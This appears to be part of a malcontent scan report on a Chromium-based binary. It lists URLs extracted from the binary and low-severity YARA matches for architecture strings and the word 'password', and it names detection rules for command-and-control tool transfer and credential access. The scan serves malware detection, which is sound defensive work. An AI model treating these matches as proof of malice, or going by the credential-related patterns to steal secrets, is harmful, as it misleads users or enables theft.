[http://www.w3.org/XML/1998/namespace](http://www.w3.org/XML/1998/namespace)
[https://blog.chromium.org/2019/10/no](https://blog.chromium.org/2019/10/no)
[https://duckduckgo.com/chrome_newtab](https://duckduckgo.com/chrome_newtab)
[https://github.com/antirez/linenoise](https://github.com/antirez/linenoise)
[https://nodejs.org/en/docs/inspector](https://nodejs.org/en/docs/inspector)
[https://search.seznam.cz/favicon.ico](https://search.seznam.cz/favicon.ico)
[https://search.seznam.sk/favicon.ico](https://search.seznam.sk/favicon.ico)
[https://search.yahoo.com/favicon.ico](https://search.yahoo.com/favicon.ico)
[https://search.yahoo.com/sugg/chrome](https://search.yahoo.com/sugg/chrome)
[https://www.iana.org/assignments/tls](https://www.iana.org/assignments/tls)
[http://imgs.sapo.pt/images/sapo.ico](http://imgs.sapo.pt/images/sapo.ico)
[http://search.imesh.net/favicon.ico](http://search.imesh.net/favicon.ico)
[http://www.searchnu.com/favicon.ico](http://www.searchnu.com/favicon.ico)
[https://dawn.googlesource.com/dawn/](https://dawn.googlesource.com/dawn/)
[https://dev.chromium.org/throttling](https://dev.chromium.org/throttling)
[https://dl.gmx.com/apps/favicon.ico](https://dl.gmx.com/apps/favicon.ico)
[https://en.wikipedia.org/wiki/SPKAC](https://en.wikipedia.org/wiki/SPKAC)
[https://github.com/mysticatea/abort](https://github.com/mysticatea/abort)
[https://oceanhero.today/favicon.ico](https://oceanhero.today/favicon.ico)
[https://search.daum.net/favicon.ico](https://search.daum.net/favicon.ico)
[https://search.gmx.co.uk/web/result](https://search.gmx.co.uk/web/result)
[https://tools.ietf.org/html/rfc2397](https://tools.ietf.org/html/rfc2397)
[https://tools.ietf.org/html/rfc3492](https://tools.ietf.org/html/rfc3492)
[https://tools.ietf.org/html/rfc3986](https://tools.ietf.org/html/rfc3986)
[https://tools.ietf.org/html/rfc5280](https://tools.ietf.org/html/rfc5280)
[https://tools.ietf.org/html/rfc6455](https://tools.ietf.org/html/rfc6455)
[https://tools.ietf.org/html/rfc6960](https://tools.ietf.org/html/rfc6960)
[https://tools.ietf.org/html/rfc7230](https://tools.ietf.org/html/rfc7230)
[https://tools.ietf.org/html/rfc7540](https://tools.ietf.org/html/rfc7540)
[https://www.quad9.net/home/privacy/](https://www.quad9.net/home/privacy/)
[https://www.w3.org/TR/WebCryptoAPI/](https://www.w3.org/TR/WebCryptoAPI/)
[https://www.yandex.by/chrome/newtab](https://www.yandex.by/chrome/newtab)
[https://www.yandex.kz/chrome/newtab](https://www.yandex.kz/chrome/newtab)
[https://www.yandex.ru/chrome/newtab](https://www.yandex.ru/chrome/newtab)
[https://www.yandex.ua/chrome/newtab](https://www.yandex.ua/chrome/newtab)
[https://yandex.com.tr/gorsel/search](https://yandex.com.tr/gorsel/search)
[http://addEventListenerresponsible](http://addEventListenerresponsible)
[http://tools.ietf.org/html/rfc3986](http://tools.ietf.org/html/rfc3986)
[http://www.conduit.com/favicon.ico](http://www.conduit.com/favicon.ico)
[http://www.w3.org/1998/Math/MathML](http://www.w3.org/1998/Math/MathML)
[http://www.walla.co.il/favicon.ico](http://www.walla.co.il/favicon.ico)
[https://ac.ecosia.org/autocomplete](https://ac.ecosia.org/autocomplete)
[https://aomediacodec.github.io/av1](https://aomediacodec.github.io/av1)
[https://api.qwant.com/api/suggest/](https://api.qwant.com/api/suggest/)
[https://ar.search.yahoo.com/search](https://ar.search.yahoo.com/search)
[https://at.search.yahoo.com/search](https://at.search.yahoo.com/search)
[https://au.search.yahoo.com/search](https://au.search.yahoo.com/search)
[https://br.search.yahoo.com/search](https://br.search.yahoo.com/search)
[https://c.bigcache.googleapis.com/](https://c.bigcache.googleapis.com/)
[https://ca.search.yahoo.com/search](https://ca.search.yahoo.com/search)
[https://ch.search.yahoo.com/search](https://ch.search.yahoo.com/search)
[https://chrome.google.com/webstore](https://chrome.google.com/webstore)
[https://cl.search.yahoo.com/search](https://cl.search.yahoo.com/search)
[https://co.search.yahoo.com/search](https://co.search.yahoo.com/search)
[https://de.search.yahoo.com/search](https://de.search.yahoo.com/search)
[https://dk.search.yahoo.com/search](https://dk.search.yahoo.com/search)
[https://duckduckgo.com/favicon.ico](https://duckduckgo.com/favicon.ico)
[https://es.search.yahoo.com/search](https://es.search.yahoo.com/search)
[https://fi.search.yahoo.com/search](https://fi.search.yahoo.com/search)
[https://fr.search.yahoo.com/search](https://fr.search.yahoo.com/search)
[https://github.com/WICG/conversion](https://github.com/WICG/conversion)
[https://github.com/WICG/scheduling](https://github.com/WICG/scheduling)
[https://github.com/WebAssembly/esm](https://github.com/WebAssembly/esm)
[https://go.imgsmail.ru/favicon.ico](https://go.imgsmail.ru/favicon.ico)
[https://hk.search.yahoo.com/search](https://hk.search.yahoo.com/search)
[https://id.search.yahoo.com/search](https://id.search.yahoo.com/search)
[https://in.search.yahoo.com/search](https://in.search.yahoo.com/search)
[https://metager.org/meta/meta.ger3](https://metager.org/meta/meta.ger3)
[https://mx.search.yahoo.com/search](https://mx.search.yahoo.com/search)
[https://nl.search.yahoo.com/search](https://nl.search.yahoo.com/search)
[https://nz.search.yahoo.com/search](https://nz.search.yahoo.com/search)
[https://pe.search.yahoo.com/search](https://pe.search.yahoo.com/search)
[https://ph.search.yahoo.com/search](https://ph.search.yahoo.com/search)
[https://qc.search.yahoo.com/search](https://qc.search.yahoo.com/search)
[https://se.search.yahoo.com/search](https://se.search.yahoo.com/search)
[https://sg.search.yahoo.com/search](https://sg.search.yahoo.com/search)
[https://suggest.yandex.com/suggest](https://suggest.yandex.com/suggest)
[https://suggests.go.mail.ru/chrome](https://suggests.go.mail.ru/chrome)
[https://th.search.yahoo.com/search](https://th.search.yahoo.com/search)
[https://tr.search.yahoo.com/search](https://tr.search.yahoo.com/search)
[https://tw.search.yahoo.com/search](https://tw.search.yahoo.com/search)
[https://uk.search.yahoo.com/search](https://uk.search.yahoo.com/search)
[https://ve.search.yahoo.com/search](https://ve.search.yahoo.com/search)
[https://vn.search.yahoo.com/search](https://vn.search.yahoo.com/search)
[https://www.bing.com/chrome/newtab](https://www.bing.com/chrome/newtab)
[https://www.givero.com/favicon.ico](https://www.givero.com/favicon.ico)
[http://search.avg.com/favicon.ico](http://search.avg.com/favicon.ico)
[http://www.w3.org/2000/09/xmldsig](http://www.w3.org/2000/09/xmldsig)
[http://xmlsoft.org/XSLT/namespace](http://xmlsoft.org/XSLT/namespace)
[https://ac.search.naver.com/nx/ac](https://ac.search.naver.com/nx/ac)
[https://cleanbrowsing.org/privacy](https://cleanbrowsing.org/privacy)
[https://encoding.spec.whatwg.org/](https://encoding.spec.whatwg.org/)
[https://github.com/WICG/construct](https://github.com/WICG/construct)
[https://github.com/chalk/supports](https://github.com/chalk/supports)
[https://github.com/google/closure](https://github.com/google/closure)
[https://github.com/mafintosh/pump](https://github.com/mafintosh/pump)
[https://go.mail.ru/chrome/newtab/](https://go.mail.ru/chrome/newtab/)
[https://hladaj.atlas.sk/fulltext/](https://hladaj.atlas.sk/fulltext/)
[https://metager.de/meta/meta.ger3](https://metager.de/meta/meta.ger3)
[https://search.gmx.com/web/result](https://search.gmx.com/web/result)
[https://search.yahoo.co.jp/search](https://search.yahoo.co.jp/search)
[https://sourcemaps.info/spec.html](https://sourcemaps.info/spec.html)
[https://suggest.yandex.by/suggest](https://suggest.yandex.by/suggest)
[https://suggest.yandex.kz/suggest](https://suggest.yandex.kz/suggest)
[https://suggest.yandex.ru/suggest](https://suggest.yandex.ru/suggest)
[https://suggest.yandex.ua/suggest](https://suggest.yandex.ua/suggest)
[https://suggestplugin.gmx.co.uk/s](https://suggestplugin.gmx.co.uk/s)
[https://www.baidu.com/favicon.ico](https://www.baidu.com/favicon.ico)
[https://www.neti.ee/api/suggestOS](https://www.neti.ee/api/suggestOS)
[https://www.qwant.com/favicon.ico](https://www.qwant.com/favicon.ico)
[https://www.zoznam.sk/favicon.ico](https://www.zoznam.sk/favicon.ico)
[https://www.zoznam.sk/hladaj.fcgi](https://www.zoznam.sk/hladaj.fcgi)
[http://code.google.com/p/closure](http://code.google.com/p/closure)
[http://hladaj.atlas.sk/fulltext/](http://hladaj.atlas.sk/fulltext/)
[http://l.twimg.com/i/hpkp_report](http://l.twimg.com/i/hpkp_report)
[http://pesquisa.sapo.pt/livesapo](http://pesquisa.sapo.pt/livesapo)
[http://purl.org/dc/elements/1.1/](http://purl.org/dc/elements/1.1/)
[http://search.tut.by/favicon.ico](http://search.tut.by/favicon.ico)
[http://suggest.yandex.ru/suggest](http://suggest.yandex.ru/suggest)
[http://www.neti.ee/api/suggestOS](http://www.neti.ee/api/suggestOS)
[http://www.w3.org/2001/XMLSchema](http://www.w3.org/2001/XMLSchema)
[http://www.w3.org/2002/08/xquery](http://www.w3.org/2002/08/xquery)
[http://www.zoznam.sk/hladaj.fcgi](http://www.zoznam.sk/hladaj.fcgi)
[https://c.googlesyndication.com/](https://c.googlesyndication.com/)
[https://console.spec.whatwg.org/](https://console.spec.whatwg.org/)
[https://developer.mozilla.org/en](https://developer.mozilla.org/en)
[https://github.com/mafintosh/end](https://github.com/mafintosh/end)
[https://github.com/tc39/proposal](https://github.com/tc39/proposal)
[https://github.com/w3c/webappsec](https://github.com/w3c/webappsec)
[https://heycam.github.io/webidl/](https://heycam.github.io/webidl/)
[https://search.gmx.es/web/result](https://search.gmx.es/web/result)
[https://search.gmx.fr/web/result](https://search.gmx.fr/web/result)
[https://search.goo.ne.jp/sgt.jsp](https://search.goo.ne.jp/sgt.jsp)
[https://search.goo.ne.jp/web.jsp](https://search.goo.ne.jp/web.jsp)
[https://suche.gmx.net/web/result](https://suche.gmx.net/web/result)
[https://www.bing.com/osjson.aspx](https://www.bing.com/osjson.aspx)
[https://www.delfi.lt/favicon.ico](https://www.delfi.lt/favicon.ico)
[https://yandex.by/images/search/](https://yandex.by/images/search/)
[https://yandex.com/images/search](https://yandex.com/images/search)
[https://yandex.kz/images/search/](https://yandex.kz/images/search/)
[https://yandex.ru/images/search/](https://yandex.ru/images/search/)
[https://yandex.ua/images/search/](https://yandex.ua/images/search/)
[http://csp.yahoo.com/beacon/csp](http://csp.yahoo.com/beacon/csp)
[http://g1.delphi.lv/favicon.ico](http://g1.delphi.lv/favicon.ico)
[http://mysearch.sweetpacks.com/](http://mysearch.sweetpacks.com/)
[http://ns.adobe.com/xap/1.0/mm/](http://ns.adobe.com/xap/1.0/mm/)
[http://search.goo.ne.jp/sgt.jsp](http://search.goo.ne.jp/sgt.jsp)
[http://search.goo.ne.jp/web.jsp](http://search.goo.ne.jp/web.jsp)
[http://szukaj.wp.pl/szukaj.html](http://szukaj.wp.pl/szukaj.html)
[http://www.aiim.org/pdfa/ns/id/](http://www.aiim.org/pdfa/ns/id/)
[http://www.delfi.lv/search_all/](http://www.delfi.lv/search_all/)
[https://chromium.dns.nextdns.io](https://chromium.dns.nextdns.io)
[https://github.com/isaacs/color](https://github.com/isaacs/color)
[https://log.getdropbox.com/hpkp](https://log.getdropbox.com/hpkp)
[https://matteomarescotti.report](https://matteomarescotti.report)
[https://nodejs.org/api/cli.html](https://nodejs.org/api/cli.html)
[https://nova.rambler.ru/suggest](https://nova.rambler.ru/suggest)
[https://play.google.com/billing](https://play.google.com/billing)
[https://search.yahoo.com/search](https://search.yahoo.com/search)
[https://suche.gmx.at/web/result](https://suche.gmx.at/web/result)
[https://suggestion.baidu.com/su](https://suggestion.baidu.com/su)
[https://suggestplugin.gmx.com/s](https://suggestplugin.gmx.com/s)
[https://suggestplugin.gmx.net/s](https://suggestplugin.gmx.net/s)
[https://tc39.github.io/ecma262/](https://tc39.github.io/ecma262/)
[https://w3c.github.io/encrypted](https://w3c.github.io/encrypted)
[https://w3c.github.io/manifest/](https://w3c.github.io/manifest/)
[https://w3c.github.io/webappsec](https://w3c.github.io/webappsec)
[http://crl.globalsign.net/root](http://crl.globalsign.net/root)
[http://mystart.incredibar.com/](http://mystart.incredibar.com/)
[http://nova.rambler.ru/suggest](http://nova.rambler.ru/suggest)
[http://search.babylon.com/home](http://search.babylon.com/home)
[http://searchatlas.centrum.cz/](http://searchatlas.centrum.cz/)
[http://www.neti.ee/favicon.ico](http://www.neti.ee/favicon.ico)
[http://www.w3.org/Graphics/SVG](http://www.w3.org/Graphics/SVG)
[http://www.wencodeURIComponent](http://www.wencodeURIComponent)
[http://www.xfa.org/schema/xci/](http://www.xfa.org/schema/xci/)
[http://www.xfa.org/schema/xdc/](http://www.xfa.org/schema/xdc/)
[https://buscador.softonic.com/](https://buscador.softonic.com/)
[https://coccoc.com/favicon.ico](https://coccoc.com/favicon.ico)
[https://dnsnl.alekberg.net/dns](https://dnsnl.alekberg.net/dns)
[https://infra.spec.whatwg.org/](https://infra.spec.whatwg.org/)
[https://isearch.avg.com/search](https://isearch.avg.com/search)
[https://metager.de/favicon.ico](https://metager.de/favicon.ico)
[https://nodejs.org/api/fs.html](https://nodejs.org/api/fs.html)
[https://nova.rambler.ru/search](https://nova.rambler.ru/search)
[https://petalsearch.com/search](https://petalsearch.com/search)
[https://search.daum.net/search](https://search.daum.net/search)
[https://suggestplugin.gmx.at/s](https://suggestplugin.gmx.at/s)
[https://suggestplugin.gmx.es/s](https://suggestplugin.gmx.es/s)
[https://suggestplugin.gmx.fr/s](https://suggestplugin.gmx.fr/s)
[https://www.givero.com/suggest](https://www.givero.com/suggest)
[https://www.so.com/favicon.ico](https://www.so.com/favicon.ico)
[https://www.softonic.com.br/s/](https://www.softonic.com.br/s/)
[https://www.w3.org/TR/powerful](https://www.w3.org/TR/powerful)
[https://www.w3.org/TR/webauthn](https://www.w3.org/TR/webauthn)
[http://buscador.softonic.com/](http://buscador.softonic.com/)
[http://isearch.avg.com/search](http://isearch.avg.com/search)
[http://nova.rambler.ru/search](http://nova.rambler.ru/search)
[http://search.imesh.net/music](http://search.imesh.net/music)
[http://www.conduit.com/search](http://www.conduit.com/search)
[http://www.softonic.com.br/s/](http://www.softonic.com.br/s/)
[http://www.w3.org/2000/xmlns/](http://www.w3.org/2000/xmlns/)
[http://www.w3.org/TR/1999/REC](http://www.w3.org/TR/1999/REC)
[http://www.xfa.com/schema/xfa](http://www.xfa.com/schema/xfa)
[http://www.xfa.org/schema/xfa](http://www.xfa.org/schema/xfa)
[https://github.com/chalk/ansi](https://github.com/chalk/ansi)
[https://public.dns.iij.jp/dns](https://public.dns.iij.jp/dns)
[https://search.avg.com/route/](https://search.avg.com/route/)
[https://sug.so.360.cn/suggest](https://sug.so.360.cn/suggest)
[https://www.delfi.lt/paieska/](https://www.delfi.lt/paieska/)
[https://www.ecosia.org/search](https://www.ecosia.org/search)
[https://www.givero.com/search](https://www.givero.com/search)
[https://www.google.com/speech](https://www.google.com/speech)
[https://xhr.spec.whatwg.org/.](https://xhr.spec.whatwg.org/.)
[http://Descriptionrelatively](http://Descriptionrelatively)
[http://ns.adobe.com/pdf/1.3/](http://ns.adobe.com/pdf/1.3/)
[http://ns.adobe.com/xdp/pdf/](http://ns.adobe.com/xdp/pdf/)
[http://ns.adobe.com/xmpmeta/](http://ns.adobe.com/xmpmeta/)
[http://ok.hu/gfx/favicon.ico](http://ok.hu/gfx/favicon.ico)
[http://search.avg.com/route/](http://search.avg.com/route/)
[http://search.avg.com/search](http://search.avg.com/search)
[http://www.delfi.lt/paieska/](http://www.delfi.lt/paieska/)
[http://www.ietf.org/id/draft](http://www.ietf.org/id/draft)
[http://www.w3.org/1999/02/22](http://www.w3.org/1999/02/22)
[http://www.w3.org/1999/xhtml](http://www.w3.org/1999/xhtml)
[http://www.w3.org/1999/xlink](http://www.w3.org/1999/xlink)
[https://alekberg.net/privacy](https://alekberg.net/privacy)
[https://dns64.dns.google/dns](https://dns64.dns.google/dns)
[https://doh.quickline.ch/dns](https://doh.quickline.ch/dns)
[https://search.softonic.com/](https://search.softonic.com/)
[https://url.spec.whatwg.org/](https://url.spec.whatwg.org/)
[https://www.microsoft.com/en](https://www.microsoft.com/en)
[https://www.verisign.com/rpa](https://www.verisign.com/rpa)
[http://crl.godaddy.com/gds1](http://crl.godaddy.com/gds1)
[http://www.searchnu.com/web](http://www.searchnu.com/web)
[https://c.drive.google.com/](https://c.drive.google.com/)
[https://crbug.com/dawn/1016](https://crbug.com/dawn/1016)
[https://crbug.com/dawn/1071](https://crbug.com/dawn/1071)
[https://crbug.com/dawn/1203](https://crbug.com/dawn/1203)
[https://crbug.com/dawn/1264](https://crbug.com/dawn/1264)
[https://crbug.com/dawn/1302](https://crbug.com/dawn/1302)
[https://crbug.com/dawn/1305](https://crbug.com/dawn/1305)
[https://crbug.com/tint/1003](https://crbug.com/tint/1003)
[https://dns10.quad9.net/dns](https://dns10.quad9.net/dns)
[https://dns11.quad9.net/dns](https://dns11.quad9.net/dns)
[https://doh.opendns.com/dns](https://doh.opendns.com/dns)
[https://doh.xfinity.com/dns](https://doh.xfinity.com/dns)
[https://github.com/standard](https://github.com/standard)
[https://oceanhero.today/web](https://oceanhero.today/web)
[https://search.walla.co.il/](https://search.walla.co.il/)
[https://www.bing.com/search](https://www.bing.com/search)
[https://www.softonic.com/s/](https://www.softonic.com/s/)
[http://ocsp.godaddy.com/0J](http://ocsp.godaddy.com/0J)
[http://search.walla.co.il/](http://search.walla.co.il/)
[http://www.softonic.com/s/](http://www.softonic.com/s/)
[http://www.w3.org/2000/svg](http://www.w3.org/2000/svg)
[http://www.w3.org/shortcut](http://www.w3.org/shortcut)
[https://c.docs.google.com/](https://c.docs.google.com/)
[https://c.pack.google.com/](https://c.pack.google.com/)
[https://c.play.google.com/](https://c.play.google.com/)
[https://crbug.com/1038223.](https://crbug.com/1038223.)
[https://crbug.com/1144908.](https://crbug.com/1144908.)
[https://crbug.com/dawn/136](https://crbug.com/dawn/136)
[https://crbug.com/dawn/145](https://crbug.com/dawn/145)
[https://crbug.com/dawn/155](https://crbug.com/dawn/155)
[https://crbug.com/dawn/193](https://crbug.com/dawn/193)
[https://crbug.com/dawn/237](https://crbug.com/dawn/237)
[https://crbug.com/dawn/271](https://crbug.com/dawn/271)
[https://crbug.com/dawn/286](https://crbug.com/dawn/286)
[https://crbug.com/dawn/342](https://crbug.com/dawn/342)
[https://crbug.com/dawn/343](https://crbug.com/dawn/343)
[https://crbug.com/dawn/402](https://crbug.com/dawn/402)
[https://crbug.com/dawn/434](https://crbug.com/dawn/434)
[https://crbug.com/dawn/480](https://crbug.com/dawn/480)
[https://crbug.com/dawn/582](https://crbug.com/dawn/582)
[https://crbug.com/dawn/633](https://crbug.com/dawn/633)
[https://crbug.com/dawn/666](https://crbug.com/dawn/666)
[https://crbug.com/dawn/667](https://crbug.com/dawn/667)
[https://crbug.com/dawn/673](https://crbug.com/dawn/673)
[https://crbug.com/dawn/776](https://crbug.com/dawn/776)
[https://crbug.com/dawn/792](https://crbug.com/dawn/792)
[https://crbug.com/dawn/838](https://crbug.com/dawn/838)
[https://crbug.com/dawn/840](https://crbug.com/dawn/840)
[https://crbug.com/dawn/960](https://crbug.com/dawn/960)
[https://duckduckgo.com/ac/](https://duckduckgo.com/ac/)
[https://en.softonic.com/s/](https://en.softonic.com/s/)
[https://go.mail.ru/msearch](https://go.mail.ru/msearch)
[https://m.so.com/index.php](https://m.so.com/index.php)
[https://nextdns.io/privacy](https://nextdns.io/privacy)
[https://nl.softonic.com/s/](https://nl.softonic.com/s/)
[https://tobiassachs.report](https://tobiassachs.report)
[https://yandex.com/search/](https://yandex.com/search/)
[http://en.softonic.com/s/](http://en.softonic.com/s/)
[http://nl.softonic.com/s/](http://nl.softonic.com/s/)
[http://ns.adobe.com/xfdf/](http://ns.adobe.com/xfdf/)
[http://search.snapdo.com/](http://search.snapdo.com/)
[http://unisolated.invalid](http://unisolated.invalid)
[http://www.interpretation](http://www.interpretation)
[https://chrome.cloudflare](https://chrome.cloudflare)
[https://coccoc.com/search](https://coccoc.com/search)
[https://crbug.com/1025266](https://crbug.com/1025266)
[https://crbug.com/1053756](https://crbug.com/1053756)
[https://crbug.com/1154140](https://crbug.com/1154140)
[https://crbug.com/1161355](https://crbug.com/1161355)
[https://crbug.com/1214923](https://crbug.com/1214923)
[https://crbug.com/1302249](https://crbug.com/1302249)
[https://crbug.com/1313172](https://crbug.com/1313172)
[https://crbug.com/619103.](https://crbug.com/619103.)
[https://crbug.com/638180.](https://crbug.com/638180.)
[https://crbug.com/dawn/36](https://crbug.com/dawn/36)
[https://crbug.com/dawn/42](https://crbug.com/dawn/42)
[https://crbug.com/dawn/56](https://crbug.com/dawn/56)
[https://crbug.com/v8/7848](https://crbug.com/v8/7848)
[https://crbug.com/v8/8520](https://crbug.com/v8/8520)
[https://dns.quad9.net/dns](https://dns.quad9.net/dns)
[https://dns.switch.ch/dns](https://dns.switch.ch/dns)
[https://go.mail.ru/search](https://go.mail.ru/search)
[https://scotthelme.report](https://scotthelme.report)
[https://www.info.com/serp](https://www.info.com/serp)
[https://www.sogou.com/web](https://www.sogou.com/web)
[https://www.w3.org/TR/mse](https://www.w3.org/TR/mse)
[http://crbug.com/1138528](http://crbug.com/1138528)
[http://crbug.com/660005.](http://crbug.com/660005.)
[http://mathematicsmargin](http://mathematicsmargin)
[http://ns.adobe.com/data](http://ns.adobe.com/data)
[http://radce.centrum.cz/](http://radce.centrum.cz/)
[http://www.jclark.com/xt](http://www.jclark.com/xt)
[http://www.w3.org/TR/REC](http://www.w3.org/TR/REC)
[https://crbug.com/401439](https://crbug.com/401439)
[https://crbug.com/824383](https://crbug.com/824383)
[https://crbug.com/824647](https://crbug.com/824647)
[https://crbug.com/927119](https://crbug.com/927119)
[https://crbug.com/981419](https://crbug.com/981419)
[https://docs.google.com/](https://docs.google.com/)
[https://googlevideo.com/](https://googlevideo.com/)
[https://m.sogou.com/web/](https://m.sogou.com/web/)
[https://mths.be/punycode](https://mths.be/punycode)
[https://ssl.gstatic.com/](https://ssl.gstatic.com/)
[https://tc39.es/ecma262/](https://tc39.es/ecma262/)
[https://www.nic.cz/odvr/](https://www.nic.cz/odvr/)
[https://www.w3.org/TR/hr](https://www.w3.org/TR/hr)
[http://applicationslink](http://applicationslink)
[http://exslt.org/common](http://exslt.org/common)
[http://feed.snapdo.com/](http://feed.snapdo.com/)
[http://www.search.delta](http://www.search.delta)
[https://android.com/pay](https://android.com/pay)
[https://bit.ly/3rpDuEX.](https://bit.ly/3rpDuEX.)
[https://crbug.com/tint.](https://crbug.com/tint.)
[https://dns.sb/privacy/](https://dns.sb/privacy/)
[https://doh.cox.net/dns](https://doh.cox.net/dns)
[https://odvr.nic.cz/doh](https://odvr.nic.cz/doh)
[https://server1.example](https://server1.example)
[https://server2.example](https://server2.example)
[https://www.ask.com/web](https://www.ask.com/web)
[https://www.baidu.com/s](https://www.baidu.com/s)
[https://www.neti.ee/cgi](https://www.neti.ee/cgi)
[http://html4/loose.dtd](http://html4/loose.dtd)
[http://ok.hu/katalogus](http://ok.hu/katalogus)
[http://search.snap.do/](http://search.snap.do/)
[http://staticsuggested](http://staticsuggested)
[http://www.example.com](http://www.example.com)
[http://www.neti.ee/cgi](http://www.neti.ee/cgi)
[https://c.youtube.com/](https://c.youtube.com/)
[https://dns.google/dns](https://dns.google/dns)
[https://doh.dns.sb/dns](https://doh.dns.sb/dns)
[https://google.com/pay](https://google.com/pay)
[https://history.report](https://history.report)
[https://v8.dev/blog/v8](https://v8.dev/blog/v8)
[https://webrtc.org/web](https://webrtc.org/web)
[http://iparticipation](http://iparticipation)
[https://crbug.com/new](https://crbug.com/new)
[https://gcp.gvt2.com/](https://gcp.gvt2.com/)
[https://gcp.gvt6.com/](https://gcp.gvt6.com/)
[https://github.com/da](https://github.com/da)
[https://goo.gl/4NeimX](https://goo.gl/4NeimX)
[https://goo.gl/7K7WLu](https://goo.gl/7K7WLu)
[https://goo.gl/EuHzyv](https://goo.gl/EuHzyv)
[https://goo.gl/HxfxSQ](https://goo.gl/HxfxSQ)
[https://goo.gl/J6ASzs](https://goo.gl/J6ASzs)
[https://goo.gl/LdLk22](https://goo.gl/LdLk22)
[https://goo.gl/Y0ZkNV](https://goo.gl/Y0ZkNV)
[https://goo.gl/rStTGz](https://goo.gl/rStTGz)
[https://goo.gl/t5IS6M](https://goo.gl/t5IS6M)
[https://goo.gl/xX8pDD](https://goo.gl/xX8pDD)
[https://goo.gl/ximf56](https://goo.gl/ximf56)
[https://goo.gl/yabPex](https://goo.gl/yabPex)
[http://feed.snap.do/](http://feed.snap.do/)
[http://icl.com/saxon](http://icl.com/saxon)
[http://narwhaljs.org](http://narwhaljs.org)
[http://userguide.icu](http://userguide.icu)
[http://wpad/wpad.dat](http://wpad/wpad.dat)
[http://www.color.org](http://www.color.org)
[http://www.language=](http://www.language=)
[http://www.yhs.delta](http://www.yhs.delta)
[https://bit.ly/audio](https://bit.ly/audio)
[https://www.so.com/s](https://www.so.com/s)
[http://mixidj.delta](http://mixidj.delta)
[http://www.midnight](http://www.midnight)
[https://example.org](https://example.org)
[http://interpreted](http://interpreted)
[http://www.hortcut](http://www.hortcut)
[http://www2.public](http://www2.public)
[https://m.so.com/s](https://m.so.com/s)
[https://wiki.squid](https://wiki.squid)
[https://www.recent](https://www.recent)
[http://dts.search](http://dts.search)
[http://feross.org](http://feross.org)
[http://interested](http://interested)
[http://navigation](http://navigation)
[http://www.C//DTD](http://www.C//DTD)
[http://www.iec.ch](http://www.iec.ch)
[http://www.style=](http://www.style=)
[http://www1.delta](http://www1.delta)
[http://www2.delta](http://www2.delta)
[https://gvt1.com/](https://gvt1.com/)
[https://gvt2.com/](https://gvt2.com/)
[https://gvt6.com/](https://gvt6.com/)
[https://invisible](https://invisible)
[https://www.World](https://www.World)
[http://127.0.0.1](http://127.0.0.1)
[http://according](http://according)
[http://encoding=](http://encoding=)
[http://imEnglish](http://imEnglish)
[http://localhost](http://localhost)
[http://site_name](http://site_name)
[http://www.delta](http://www.delta)
[http://www.squid](http://www.squid)
[http://www.years](http://www.years)
[https://www.ecma](https://www.ecma)
[http://familiar](http://familiar)
[http://www./div](http://www./div)
[http://www.icon](http://www.icon)
[http://www.text](http://www.text) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Username and password are expected to](https://github.com/search?q=Username+and+password+are+expected+to&type=code)
[accessibilityPasswordValuesEnabled](https://github.com/search?q=accessibilityPasswordValuesEnabled&type=code)
[to deserialize password_string](https://github.com/search?q=to+deserialize+password_string&type=code)
[have-a-username-password-port](https://github.com/search?q=have-a-username-password-port&type=code)
[ChromePasswordManagerClient](https://github.com/search?q=ChromePasswordManagerClient&type=code)
[have-username-password-port](https://github.com/search?q=have-username-password-port&type=code)
[keyring_store_password_sync](https://github.com/search?q=keyring_store_password_sync&type=code)
[keyring_find_password_sync](https://github.com/search?q=keyring_find_password_sync&type=code)
[secret_password_clear_sync](https://github.com/search?q=secret_password_clear_sync&type=code)
[secret_password_store_sync](https://github.com/search?q=secret_password_store_sync&type=code)
[or PasswordCredentialData](https://github.com/search?q=or+PasswordCredentialData&type=code)
[Invalid password pattern](https://github.com/search?q=Invalid+password+pattern&type=code)
[generated a new password](https://github.com/search?q=generated+a+new+password&type=code)
[AccountPasswordsConsent](https://github.com/search?q=AccountPasswordsConsent&type=code)
[a username and password](https://github.com/search?q=a+username+and+password&type=code)
[and password fields set](https://github.com/search?q=and+password+fields+set&type=code)
[keyring_delete_password](https://github.com/search?q=keyring_delete_password&type=code)
[PasswordReuseDetected](https://github.com/search?q=PasswordReuseDetected&type=code)
[PasswordSpecificsData](https://github.com/search?q=PasswordSpecificsData&type=code)
[keyring_free_password](https://github.com/search?q=keyring_free_password&type=code)
[password is too large](https://github.com/search?q=password+is+too+large&type=code)
[GaiaPasswordCaptured](https://github.com/search?q=GaiaPasswordCaptured&type=code)
[username or password](https://github.com/search?q=username+or+password&type=code)
[PasswordReuseLookup](https://github.com/search?q=PasswordReuseLookup&type=code)
[gaia_password_reuse](https://github.com/search?q=gaia_password_reuse&type=code)
[getPasswordComplete](https://github.com/search?q=getPasswordComplete&type=code)
[id-PasswordBasedMAC](https://github.com/search?q=id-PasswordBasedMAC&type=code)
[password-protection](https://github.com/search?q=password-protection&type=code)
[passwordDialogTitle](https://github.com/search?q=passwordDialogTitle&type=code)
[passwordEchoEnabled](https://github.com/search?q=passwordEchoEnabled&type=code)
[const has_password](https://github.com/search?q=const+has_password&type=code)
[password based MAC](https://github.com/search?q=password+based+MAC&type=code)
[password_specifics](https://github.com/search?q=password_specifics&type=code)
[GaiaPasswordReuse](https://github.com/search?q=GaiaPasswordReuse&type=code)
[challengePassword](https://github.com/search?q=challengePassword&type=code)
[such as passwords](https://github.com/search?q=such+as+passwords&type=code)
[current-password](https://github.com/search?q=current-password&type=code)
[SetPasswordFunc](https://github.com/search?q=SetPasswordFunc&type=code)
[like a password](https://github.com/search?q=like+a+password&type=code)
[password-change](https://github.com/search?q=password-change&type=code)
[password-reveal](https://github.com/search?q=password-reveal&type=code)
[passwordInvalid](https://github.com/search?q=passwordInvalid&type=code)
[PasswordIssues](https://github.com/search?q=PasswordIssues&type=code)
[PasswordReveal](https://github.com/search?q=PasswordReveal&type=code)
[password-store](https://github.com/search?q=password-store&type=code)
[passwordPrompt](https://github.com/search?q=passwordPrompt&type=code)
[passwordSubmit](https://github.com/search?q=passwordSubmit&type=code)
[password text](https://github.com/search?q=password+text&type=code)
[writePassword](https://github.com/search?q=writePassword&type=code)
